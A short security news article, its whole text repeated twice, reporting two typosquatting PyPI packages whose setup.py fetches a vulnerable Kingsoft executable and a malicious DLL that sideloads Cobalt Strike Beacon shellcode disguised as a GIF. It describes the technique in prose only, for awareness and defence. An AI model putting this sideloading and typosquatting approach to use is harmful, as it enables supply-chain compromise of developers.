The epidemic of malicious packages calls into question the security of the supply chain.
As part of a recent study by security specialists from ReversingLabs, two malicious packages were found in the Python Package Index (PyPI) repository that used the DLL Sideloading technique to bypass detection by antivirus programs and run malicious code.
The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded by users 537 and 166 times, respectively, before being removed from the repository. These figures show that even short-lived malware packages can find their victims among developers.
Malicious packages mimic the names of legitimate tools from ChapsVision used for marketing automation. This technique, called Typosquatting, is very popular among attackers targeting batch repositories.
Both packages contain the script "setup.py", which starts downloading two files: a legitimate executable file from Kingsoft ("ComServer.exe"), vulnerable to Sideloading DLL, and malicious DLL ("dgdeskband64.dll"). The technique used is highly secretive.
The purpose of the malicious DLL is to access the domain controlled by the attackers to download a file disguised as a GIF. In fact, this is the shellcode for Beacon, a tool that is widely used in cyber attacks after the initial system compromise and allows you to perform a number of malicious actions, including collecting data, moving around the network, and installing additional tools.
ReversingLabs researchers believe that the detected packages are part of a larger campaign aimed at spreading such malicious executable files, which underlines the need for vigilance on the part of developers and organizations.
Experts emphasized that it is extremely important for development organizations to be aware of the threats associated with supply chain security and the use of open package repositories.
It is imperative to thoroughly check the source code and dependencies, as well as provide additional monitoring and security measures in order to respond in time and secure your systems if an infection still occurred.
Strengthening cybersecurity and addressing threats in the software supply chain remain key challenges for organizations and developers today.
As part of a recent study by security specialists from ReversingLabs, two malicious packages were found in the Python Package Index (PyPI) repository that used the DLL Sideloading technique to bypass detection by antivirus programs and run malicious code.
The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded by users 537 and 166 times, respectively, before being removed from the repository. These figures show that even short-lived malware packages can find their victims among developers.
Malicious packages mimic the names of legitimate tools from ChapsVision used for marketing automation. This technique, called Typosquatting, is very popular among attackers targeting batch repositories.
Both packages contain the script "setup.py", which starts downloading two files: a legitimate executable file from Kingsoft ("ComServer.exe"), vulnerable to Sideloading DLL, and malicious DLL ("dgdeskband64.dll"). The technique used is highly secretive.
The purpose of the malicious DLL is to access the domain controlled by the attackers to download a file disguised as a GIF. In fact, this is the shellcode for Beacon, a tool that is widely used in cyber attacks after the initial system compromise and allows you to perform a number of malicious actions, including collecting data, moving around the network, and installing additional tools.
ReversingLabs researchers believe that the detected packages are part of a larger campaign aimed at spreading such malicious executable files, which underlines the need for vigilance on the part of developers and organizations.
Experts emphasized that it is extremely important for development organizations to be aware of the threats associated with supply chain security and the use of open package repositories.
It is imperative to thoroughly check the source code and dependencies, as well as provide additional monitoring and security measures in order to respond in time and secure your systems if an infection still occurred.
Strengthening cybersecurity and addressing threats in the software supply chain remain key challenges for organizations and developers today.
